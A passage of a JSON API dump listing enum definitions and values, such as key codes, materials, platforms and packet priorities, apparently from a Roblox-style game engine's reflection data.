,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ScrollLock","tags":[],"Value":302,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftSuper","tags":[],"Value":311,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightSuper","tags":[],"Value":312,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Mode","tags":[],"Value":313,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Compose","tags":[],"Value":314,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Help","tags":[],"Value":315,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Print","tags":[],"Value":316,"Enum":"KeyCode"},{"type":"EnumItem","Name":"SysReq","tags":[],"Value":317,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Break","tags":[],"Value":318,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Menu","tags":[],"Value":319,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Power","tags":[],"Value":320,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Euro","tags":[],"Value":321,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Undo","tags":[],"Value":322,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F1","tags":[],"Value":282,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F2","tags":[],"Value":283,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F3","tags":[],"Value":284,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F4","tags":[],"Value":285,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F5","tags":[],"Value":286,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F6","tags":[],"Value":287,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F7","tags":[],"Value":288,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F8","tags":[],"Value":289,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F9","tags":[],"Value":290,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F10","tags":[],"Value":291,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F11","tags":[],"Value":292,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F12","tags":[],"Value":293,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F13","tags":[],"Value":294,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F14","tags":[],"Value":295,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F15","tags":[],"Value":296,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World0","tags":[],"Value":160,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World1","tags":[],"Value":161,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World2","tags":[],"Value":162,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World3","tags":[],"Value":163,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World4","tags":[],"Value":164,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World5","tags":[],"Value":165,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World6","tags":[],"Value":166,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World7","tags":[],"Value":167,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World8","tags":[],"Value":168,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World9","tags":[],"Value":169,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World10","tags":[],"Value":170,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World11","tags":[],"Value":171,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World12","tags":[],"Value":172,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World13","tags":[],"Value":173,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World14","tags":[],"Value":174,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World15","tags":[],"Value":175,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World16","tags":[],"Value":176,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World17","tags":[],"Value":177,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World18","tags":[],"Value":178,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World19","tags":[],"Value":179,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World20","tags":[],"Value":180,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World21","tags":[],"Value":181,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World22","tags":[],"Value":182,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World23","tags":[],"Value":183,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World24","tags":[],"Value":184,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World25","tags":[],"Value":185,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World26","tags":[],"Value":186,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World27","tags":[],"Value":187,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World28","tags":[],"Value":188,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World29","tags":[],"Value":189,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World30","tags":[],"Value":190,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World31","tags":[],"Value":191,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World32","tags":[],"Value":192,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World33","tags":[],"Value":193,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World34","tags":[],"Value":194,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World35","tags":[],"Value":195,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World36","tags":[],"Value":196,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World37","tags":[],"Value":197,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World38","tags":[],"Value":198,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World39","tags":[],"Value":199,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World40","tags":[],"Value":200,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World41","tags":[],"Value":201,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World42","tags":[],"Value":202,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World43","tags":[],"Value":203,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World44","tags":[],"Value":204,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World45","tags":[],"Value":205,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World46","tags":[],"Value":206,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World47","tags":[],"Value":207,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World48","tags":[],"Value":208,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World49","tags":[],"Value":209,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World50","tags":[],"Value":210,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World51","tags":[],"Value":211,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World52","tags":[],"Value":212,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World53","tags":[],"Value":213,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World54","tags":[],"Value":214,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World55","tags":[],"Value":215,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World56","tags":[],"Value":216,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World57","tags":[],"Value":217,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World58","tags":[],"Value":218,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World59","tags":[],"Value":219,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World60","tags":[],"Value":220,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World61","tags":[],"Value":221,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World62","tags":[],"Value":222,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World63","tags":[],"Value":223,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World64","tags":[],"Value":224,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World65","tags":[],"Value":225,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World66","tags":[],"Value":226,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World67","tags":[],"Value":227,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World68","tags":[],"Value":228,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World69","tags":[],"Value":229,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World70","tags":[],"Value":230,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World71","tags":[],"Value":231,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World72","tags":[],"Value":232,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World73","tags":[],"Value":233,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World74","tags":[],"Value":234,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World75","tags":[],"Value":235,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World76","tags":[],"Value":236,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World77","tags":[],"Value":237,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World78","tags":[],"Value":238,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World79","tags":[],"Value":239,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World80","tags":[],"Value":240,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World81","tags":[],"Value":241,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World82","tags":[],"Value":242,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World83","tags":[],"Value":243,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World84","tags":[],"Value":244,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World85","tags":[],"Value":245,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World86","tags":[],"Value":246,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World87","tags":[],"Value":247,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World88","tags":[],"Value":248,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World89","tags":[],"Value":249,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World90","tags":[],"Value":250,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World91","tags":[],"Value":251,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World92","tags":[],"Value":252,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World93","tags":[],"Value":253,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World94","tags":[],"Value":254,"Enum":"KeyCode"},{"type":"EnumItem","Name":"World95","tags":[],"Value":255,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonX","tags":[],"Value":1000,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonY","tags":[],"Value":1001,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonA","tags":[],"Value":1002,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonB","tags":[],"Value":1003,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonR1","tags":[],"Value":1004,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonL1","tags":[],"Value":1005,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonR2","tags":[],"Value":1006,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonL2","tags":[],"Value":1007,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonR3","tags":[],"Value":1008,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonL3","tags":[],"Value":1009,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonStart","tags":[],"Value":1010,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ButtonSelect","tags":[],"Value":1011,"Enum":"KeyCode"},{"type":"EnumItem","Name":"DPadLeft","tags":[],"Value":1012,"Enum":"KeyCode"},{"type":"EnumItem","Name":"DPadRight","tags":[],"Value":1013,"Enum":"KeyCode"},{"type":"EnumItem","Name":"DPadUp","tags":[],"Value":1014,"Enum":"KeyCode"},{"type":"EnumItem","Name":"DPadDown","tags":[],"Value":1015,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Thumbstick1","tags":[],"Value":1016,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Thumbstick2","tags":[],"Value":1017,"Enum":"KeyCode"},{"type":"Enum","Name":"KeywordFilterType","tags":[]},{"type":"EnumItem","Name":"Include","tags":[],"Value":0,"Enum":"KeywordFilterType"},{"type":"EnumItem","Name":"Exclude","tags":[],"Value":1,"Enum":"KeywordFilterType"},{"type":"Enum","Name":"LeftRight","tags":[]},{"type":"EnumItem","Name":"Left","tags":[],"Value":0,"Enum":"LeftRight"},{"type":"EnumItem","Name":"Center","tags":[],"Value":1,"Enum":"LeftRight"},{"type":"EnumItem","Name":"Right","tags":[],"Value":2,"Enum":"LeftRight"},{"type":"Enum","Name":"LevelOfDetailSetting","tags":[]},{"type":"EnumItem","Name":"High","tags":[],"Value":2,"Enum":"LevelOfDetailSetting"},{"type":"EnumItem","Name":"Medium","tags":[],"Value":1,"Enum":"LevelOfDetailSetting"},{"type":"EnumItem","Name":"Low","tags":[],"Value":0,"Enum":"LevelOfDetailSetting"},{"type":"Enum","Name":"ListenerType","tags":[]},{"type":"EnumItem","Name":"Camera","tags":[],"Value":0,"Enum":"ListenerType"},{"type":"EnumItem","Name":"CFrame","tags":[],"Value":1,"Enum":"ListenerType"},{"type":"EnumItem","Name":"ObjectPosition","tags":[],"Value":2,"Enum":"ListenerType"},{"type":"EnumItem","Name":"ObjectCFrame","tags":[],"Value":3,"Enum":"ListenerType"},{"type":"Enum","Name":"Material","tags":[]},{"type":"EnumItem","Name":"Plastic","tags":[],"Value":256,"Enum":"Material"},{"type":"EnumItem","Name":"Wood","tags":[],"Value":512,"Enum":"Material"},{"type":"EnumItem","Name":"Slate","tags":[],"Value":800,"Enum":"Material"},{"type":"EnumItem","Name":"Concrete","tags":[],"Value":816,"Enum":"Material"},{"type":"EnumItem","Name":"CorrodedMetal","tags":[],"Value":1040,"Enum":"Material"},{"type":"EnumItem","Name":"DiamondPlate","tags":[],"Value":1056,"Enum":"Material"},{"type":"EnumItem","Name":"Foil","tags":[],"Value":1072,"Enum":"Material"},{"type":"EnumItem","Name":"Grass","tags":[],"Value":1280,"Enum":"Material"},{"type":"EnumItem","Name":"Ice","tags":[],"Value":1536,"Enum":"Material"},{"type":"EnumItem","Name":"Marble","tags":[],"Value":784,"Enum":"Material"},{"type":"EnumItem","Name":"Granite","tags":[],"Value":832,"Enum":"Material"},{"type":"EnumItem","Name":"Brick","tags":[],"Value":848,"Enum":"Material"},{"type":"EnumItem","Name":"Pebble","tags":[],"Value":864,"Enum":"Material"},{"type":"EnumItem","Name":"Sand","tags":[],"Value":1296,"Enum":"Material"},{"type":"EnumItem","Name":"Fabric","tags":[],"Value":1312,"Enum":"Material"},{"type":"EnumItem","Name":"SmoothPlastic","tags":[],"Value":272,"Enum":"Material"},{"type":"EnumItem","Name":"Metal","tags":[],"Value":1088,"Enum":"Material"},{"type":"EnumItem","Name":"WoodPlanks","tags":[],"Value":528,"Enum":"Material"},{"type":"EnumItem","Name":"Cobblestone","tags":[],"Value":880,"Enum":"Material"},{"type":"EnumItem","Name":"Air","tags":["notbrowsable"],"Value":1792,"Enum":"Material"},{"type":"EnumItem","Name":"Water","tags":["notbrowsable"],"Value":2048,"Enum":"Material"},{"type":"EnumItem","Name":"Rock","tags":["notbrowsable"],"Value":896,"Enum":"Material"},{"type":"EnumItem","Name":"Glacier","tags":["notbrowsable"],"Value":1552,"Enum":"Material"},{"type":"EnumItem","Name":"Snow","tags":["notbrowsable"],"Value":1328,"Enum":"Material"},{"type":"EnumItem","Name":"Sandstone","tags":["notbrowsable"],"Value":912,"Enum":"Material"},{"type":"EnumItem","Name":"Mud","tags":["notbrowsable"],"Value":1344,"Enum":"Material"},{"type":"EnumItem","Name":"Basalt","tags":["notbrowsable"],"Value":788,"Enum":"Material"},{"type":"EnumItem","Name":"Ground","tags":["notbrowsable"],"Value":1360,"Enum":"Material"},{"type":"EnumItem","Name":"CrackedLava","tags":["notbrowsable"],"Value":804,"Enum":"Material"},{"type":"EnumItem","Name":"Neon","tags":[],"Value":288,"Enum":"Material"},{"type":"EnumItem","Name":"Asphalt","tags":["notbrowsable"],"Value":1376,"Enum":"Material"},{"type":"EnumItem","Name":"LeafyGrass","tags":["notbrowsable"],"Value":1284,"Enum":"Material"},{"type":"EnumItem","Name":"Salt","tags":["notbrowsable"],"Value":1392,"Enum":"Material"},{"type":"EnumItem","Name":"Limestone","tags":["notbrowsable"],"Value":820,"Enum":"Material"},{"type":"EnumItem","Name":"Pavement","tags":["notbrowsable"],"Value":836,"Enum":"Material"},{"type":"Enum","Name":"MembershipType","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":0,"Enum":"MembershipType"},{"type":"EnumItem","Name":"BuildersClub","tags":[],"Value":1,"Enum":"MembershipType"},{"type":"EnumItem","Name":"TurboBuildersClub","tags":[],"Value":2,"Enum":"MembershipType"},{"type":"EnumItem","Name":"OutrageousBuildersClub","tags":[],"Value":3,"Enum":"MembershipType"},{"type":"Enum","Name":"MeshType","tags":[]},{"type":"EnumItem","Name":"Head","tags":[],"Value":0,"Enum":"MeshType"},{"type":"EnumItem","Name":"Torso","tags":[],"Value":1,"Enum":"MeshType"},{"type":"EnumItem","Name":"Wedge","tags":[],"Value":2,"Enum":"MeshType"},{"type":"EnumItem","Name":"Prism","tags":["deprecated"],"Value":7,"Enum":"MeshType"},{"type":"EnumItem","Name":"Pyramid","tags":["deprecated"],"Value":8,"Enum":"MeshType"},{"type":"EnumItem","Name":"ParallelRamp","tags":["deprecated"],"Value":9,"Enum":"MeshType"},{"type":"EnumItem","Name":"RightAngleRamp","tags":["deprecated"],"Value":10,"Enum":"MeshType"},{"type":"EnumItem","Name":"CornerWedge","tags":["deprecated"],"Value":11,"Enum":"MeshType"},{"type":"EnumItem","Name":"Brick","tags":[],"Value":6,"Enum":"MeshType"},{"type":"EnumItem","Name":"Sphere","tags":[],"Value":3,"Enum":"MeshType"},{"type":"EnumItem","Name":"Cylinder","tags":[],"Value":4,"Enum":"MeshType"},{"type":"EnumItem","Name":"FileMesh","tags":[],"Value":5,"Enum":"MeshType"},{"type":"Enum","Name":"MessageType","tags":[]},{"type":"EnumItem","Name":"MessageOutput","tags":[],"Value":0,"Enum":"MessageType"},{"type":"EnumItem","Name":"MessageInfo","tags":[],"Value":1,"Enum":"MessageType"},{"type":"EnumItem","Name":"MessageWarning","tags":[],"Value":2,"Enum":"MessageType"},{"type":"EnumItem","Name":"MessageError","tags":[],"Value":3,"Enum":"MessageType"},{"type":"Enum","Name":"MouseBehavior","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"MouseBehavior"},{"type":"EnumItem","Name":"LockCenter","tags":[],"Value":1,"Enum":"MouseBehavior"},{"type":"EnumItem","Name":"LockCurrentPosition","tags":[],"Value":2,"Enum":"MouseBehavior"},{"type":"Enum","Name":"MoveState","tags":[]},{"type":"EnumItem","Name":"Stopped","tags":[],"Value":0,"Enum":"MoveState"},{"type":"EnumItem","Name":"Coasting","tags":[],"Value":1,"Enum":"MoveState"},{"type":"EnumItem","Name":"Pushing","tags":[],"Value":2,"Enum":"MoveState"},{"type":"EnumItem","Name":"Stopping","tags":[],"Value":3,"Enum":"MoveState"},{"type":"EnumItem","Name":"AirFree","tags":[],"Value":4,"Enum":"MoveState"},{"type":"Enum","Name":"NameOcclusion","tags":[]},{"type":"EnumItem","Name":"OccludeAll","tags":[],"Value":2,"Enum":"NameOcclusion"},{"type":"EnumItem","Name":"EnemyOcclusion","tags":[],"Value":1,"Enum":"NameOcclusion"},{"type":"EnumItem","Name":"NoOcclusion","tags":[],"Value":0,"Enum":"NameOcclusion"},{"type":"Enum","Name":"NetworkOwnership","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":0,"Enum":"NetworkOwnership"},{"type":"EnumItem","Name":"Manual","tags":[],"Value":1,"Enum":"NetworkOwnership"},{"type":"Enum","Name":"NormalId","tags":[]},{"type":"EnumItem","Name":"Top","tags":[],"Value":1,"Enum":"NormalId"},{"type":"EnumItem","Name":"Bottom","tags":[],"Value":4,"Enum":"NormalId"},{"type":"EnumItem","Name":"Back","tags":[],"Value":2,"Enum":"NormalId"},{"type":"EnumItem","Name":"Front","tags":[],"Value":5,"Enum":"NormalId"},{"type":"EnumItem","Name":"Right","tags":[],"Value":0,"Enum":"NormalId"},{"type":"EnumItem","Name":"Left","tags":[],"Value":3,"Enum":"NormalId"},{"type":"Enum","Name":"OverrideMouseIconBehavior","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":0,"Enum":"OverrideMouseIconBehavior"},{"type":"EnumItem","Name":"ForceShow","tags":[],"Value":1,"Enum":"OverrideMouseIconBehavior"},{"type":"EnumItem","Name":"ForceHide","tags":[],"Value":2,"Enum":"OverrideMouseIconBehavior"},{"type":"Enum","Name":"PacketPriority","tags":[]},{"type":"EnumItem","Name":"IMMEDIATE_PRIORITY","tags":[],"Value":0,"Enum":"PacketPriority"},{"type":"EnumItem","Name":"HIGH_PRIORITY","tags":[],"Value":1,"Enum":"PacketPriority"},{"type":"EnumItem","Name":"MEDIUM_PRIORITY","tags":[],"Value":2,"Enum":"PacketPriority"},{"type":"EnumItem","Name":"LOW_PRIORITY","tags":[],"Value":3,"Enum":"PacketPriority"},{"type":"Enum","Name":"PacketReliability","tags":[]},{"type":"EnumItem","Name":"UNRELIABLE","tags":[],"Value":0,"Enum":"PacketReliability"},{"type":"EnumItem","Name":"UNRELIABLE_SEQUENCED","tags":[],"Value":1,"Enum":"PacketReliability"},{"type":"EnumItem","Name":"RELIABLE","tags":[],"Value":2,"Enum":"PacketReliability"},{"type":"EnumItem","Name":"RELIABLE_ORDERED","tags":[],"Value":3,"Enum":"PacketReliability"},{"type":"EnumItem","Name":"RELIABLE_SEQUENCED","tags":[],"Value":4,"Enum":"PacketReliability"},{"type":"Enum","Name":"PartType","tags":[]},{"type":"EnumItem","Name":"Ball","tags":[],"Value":0,"Enum":"PartType"},{"type":"EnumItem","Name":"Block","tags":[],"Value":1,"Enum":"PartType"},{"type":"EnumItem","Name":"Cylinder","tags":[],"Value":2,"Enum":"PartType"},{"type":"Enum","Name":"PathStatus","tags":[]},{"type":"EnumItem","Name":"Success","tags":[],"Value":0,"Enum":"PathStatus"},{"type":"EnumItem","Name":"ClosestNoPath","tags":[],"Value":1,"Enum":"PathStatus"},{"type":"EnumItem","Name":"ClosestOutOfRange","tags":[],"Value":2,"Enum":"PathStatus"},{"type":"EnumItem","Name":"FailStartNotEmpty","tags":[],"Value":3,"Enum":"PathStatus"},{"type":"EnumItem","Name":"FailFinishNotEmpty","tags":[],"Value":4,"Enum":"PathStatus"},{"type":"Enum","Name":"PhysicalPropertiesMode","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":1,"Enum":"PhysicalPropertiesMode"},{"type":"EnumItem","Name":"Legacy","tags":[],"Value":0,"Enum":"PhysicalPropertiesMode"},{"type":"EnumItem","Name":"New","tags":[],"Value":2,"Enum":"PhysicalPropertiesMode"},{"type":"Enum","Name":"PhysicsReceiveMethod","tags":[]},{"type":"EnumItem","Name":"Direct","tags":[],"Value":0,"Enum":"PhysicsReceiveMethod"},{"type":"EnumItem","Name":"Interpolation","tags":[],"Value":1,"Enum":"PhysicsReceiveMethod"},{"type":"Enum","Name":"PhysicsSendMethod","tags":[]},{"type":"EnumItem","Name":"ErrorComputation","tags":[],"Value":0,"Enum":"PhysicsSendMethod"},{"type":"EnumItem","Name":"ErrorComputation2","tags":[],"Value":1,"Enum":"PhysicsSendMethod"},{"type":"EnumItem","Name":"RoundRobin","tags":[],"Value":2,"Enum":"PhysicsSendMethod"},{"type":"EnumItem","Name":"TopNErrors","tags":[],"Value":3,"Enum":"PhysicsSendMethod"},{"type":"Enum","Name":"Platform","tags":[]},{"type":"EnumItem","Name":"Windows","tags":[],"Value":0,"Enum":"Platform"},{"type":"EnumItem","Name":"OSX","tags":[],"Value":1,"Enum":"Platform"},{"type":"EnumItem","Name":"IOS","tags":[],"Value":2,"Enum":"Platform"},{"type":"EnumItem","Name":"Android","tags":[],"Value":3,"Enum":"Platform"},{"type":"EnumItem","Name":"XBoxOne","tags":[],"Value":4,"Enum":"Platform"},{"type":"EnumItem","Name":"PS4","tags":[],"Value":5,"Enum":"Platform"},{"type":"EnumItem","Name":"PS3","tags":[],"Value":6,"Enum":"Platform"},{"type":"EnumItem","Name":"XBox360","tags":[],"Value":7,"Enum":"Platform"},{"type":"EnumItem","Name":"WiiU","tags":[],"Value":8,"Enum":"Platform"},{"type":"EnumItem","Name":"NX","tags":[],"Value":9,"Enum":"Platform"},{"type":"EnumItem","Name":"Ouya","tags":[],"Value":10,"Enum":"Platform"},{"type":"EnumItem","Name":"AndroidTV","tags":[],"Value":11,"Enum":"Platform"},{"type":"EnumItem","Name":"Chromecast","tags":[],"Value":12,"Enum":"Platform"},{"type":"EnumItem","Name":"Linux","tags":[],"Value":13,"Enum":"Platform"},{"type":"EnumItem","Name":"SteamOS","tags":[],"Value":14,"Enum":"Platform"},{"type":"EnumItem","Name":"WebOS","tags":[],"Value":15,"Enum":"Platform"},{"type":"EnumItem","Name":"DOS","tags":[],"Value":16,"Enum":"Platform"},{"type":"EnumItem","Name":"BeOS","tags":[],"Value":17,"Enum":"Platform"},{"type":"EnumItem","Name":"UWP","tags":[],"Value":18,"Enum":"Platform"},{"type":"EnumItem","Name":"None","tags":[],"Value":19,"Enum":"Platform"},{"type":"Enum","Name":"PlayerActions","tags":[]},{"type":"EnumItem","Name":"CharacterForward","tags":[],"Value":0,"Enum":"PlayerActions"},{"type":"EnumItem","Name":"CharacterBackward","tags":[],"Value":1,"Enum":"PlayerActions"},{"type":"EnumItem","Name":"CharacterLeft","tags":[],"Value":2,"Enum":"PlayerActions"},{"type":"EnumItem","Name":"CharacterRight","tags":[],"Value":3,"Enum":"PlayerActions"},{"type":"EnumItem","Name":"CharacterJump","tags":[],"Value":4,"Enum":"PlayerActions"},{"type":"Enum","Name":"PlayerChatType","tags":[]},{"type":"EnumItem","Name":"All","tags":[],"Value":0,"Enum":"PlayerChatType"},{"type":"EnumItem","Name":"Team","tags":[],"Value":1,"Enum":"PlayerChatType"},{"type":"EnumItem","Name":"Whisper","tags":[],"Value":2,"Enum":"PlayerChatType"},{"type":"Enum","Name":"PoseEasingDirection","tags":[]},{"type":"EnumItem","Name":"Out","tags":[],"Value":1,"Enum":"PoseEasingDirection"},{"type":"EnumItem","Name":"InOut","tags":[],"Value":2,"Enum":"PoseEasingDirection"},{"type":"EnumItem","Name":"In","tags":[],"Value":0,"Enum":"PoseEasingDirection"},{"type":"Enum","Name":"PoseEasingStyle","tags":[]},{"type":"EnumItem","Name":"Linear","tags":[],"Value":0,"Enum":"PoseEasingStyle"},{"type":"EnumItem","Name":"Constant","tags":[],"Value":1,"Enum":"PoseEasingStyle"},{"type":"EnumItem","Name":"Elastic","tags":[],"Value":2,"Enum":"PoseEasingStyle"},{"type":"EnumItem","Name":"Cubic","tags":[],"Value":3,"Enum":"PoseEasingStyle"},{"type":"EnumItem","Name":"Bounce","tags":[],"Value":4,"Enum":"PoseEasingStyle"},{"type":"Enum","Name":"PriorityMethod","tags":[]},{"type":"EnumItem","Name":"LastError","tags":[],"Value":0,"Enum":"PriorityMethod"},{"type":"EnumItem","Name":"AccumulatedError","tags":[],"Value":1,"Enum":"PriorityMethod"},{"type":"EnumItem","Name":"FIFO","tags":[],"Value":2,"Enum":"PriorityMethod"},{"type":"Enum","Name":"PrismSides","tags":[]},{"type":"EnumItem","Name":"3","tags":[],"Value":3,"Enum":"PrismSides"},{"type":"EnumItem","Name":"5","tags":[],"Value":5,"Enum":"PrismSides"},{"type":"EnumItem","Name":"6","tags":[],"Value":6,"Enum":"PrismSides"},{"type":"EnumItem","Name":"8","tags":[],"Value":8,"Enum":"PrismSides"},{"type":"EnumItem","Name":"10","tags":[],"Value":10,"Enum":"PrismSides"},{"type":"EnumItem","Name":"20","tags":[],"Value":20,"Enum":"PrismSides"},{"type":"Enum","Name":"PrivilegeType","tags":[]},{"type":"EnumItem","Name":"Owner","tags":[],"Value":255,"Enum":"PrivilegeType"},{"type":"EnumItem","Name":"Admin","tags":[],"Value":240,"Enum":"PrivilegeType"},{"type":"EnumItem","Name":"Member","tags":[],"Value":128,"Enum":"PrivilegeType"},{"type":"EnumItem","Name":"Visitor","tags":[],"Value":10,"Enum":"PrivilegeType"},{"type":"EnumItem","Name":"Banned","tags":[],"Value":0,"Enum":"PrivilegeType"},{"type":"Enum","Name":"ProductPurchaseDecision","tags":[]},{"type":"EnumItem","Name":"NotProcessedYet","tags":[],"Value":0,"Enum":"ProductPurchaseDecision"},{"type":"EnumItem","Name":"PurchaseGranted","tags":[],"Value":1,"Enum":"ProductPurchaseDecision"},{"type":"Enum","Name":"PyramidSides","tags":[]},{"type":"EnumItem","Name":"3","tags":[],"Value":3,"Enum":"PyramidSides"},{"type":"EnumItem","Name":"4","tags":[],"Value":4,"Enum":"PyramidSides"},{"type":"EnumItem","Name":"5","tags":[],"Value":5,"Enum":"PyramidSides"},{"type":"EnumItem","Name":"6","tags":[],"Value":6,"Enum":"PyramidSides"},{"type":"EnumItem","Name":"8","tags":[],"Value":8,"Enum":"PyramidSides"},{"type":"EnumItem","Name":"10","tags":[],"Value":10,"Enum":"PyramidSides"},{"type":"EnumItem","Name":"20","tags":[],"Value":20,"Enum":"PyramidSides"},{"type":"Enum","Name":"QualityLevel","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":0,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level01","tags":[],"Value":1,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level02","tags":[],"Value":2,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level03","tags":[]